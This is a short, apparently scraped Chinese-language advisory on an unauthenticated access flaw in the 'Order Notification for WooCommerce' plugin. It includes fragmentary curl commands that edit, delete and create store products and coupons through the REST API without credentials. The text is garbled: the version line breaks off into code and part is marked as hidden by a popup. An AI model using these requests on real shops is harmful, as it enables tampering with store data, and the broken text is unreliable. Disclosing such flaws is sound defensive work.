### 漏洞概述 该漏洞存在于 **Order Notification for WooCommerce** 插件中。该插件错误地覆盖了 WooCommerce 的权限检查机制,导致攻击者无需任何认证即可对所有未认证请求拥有完全访问权限。这使得攻击者能够完全读写商店资源,包括商品(products)、优惠券(coupons)和顾客(customers)。 ### 影响范围 * **插件名称:** Order Notification for WooCommerce * **受影响版本:** ) curl -i -X PUT "http://localhost:10005/wp-json/wc/v3/products/" -H "Content-Type: application/json" --data '{"regular_price"... # 4) Delete the created product (replace ) curl -i -X DELETE "http://localhost:10005/wp-json/wc/v3/products/?force=true" # 5) Create a coupon without authentication curl -i -X ... (部分被弹窗遮挡) ```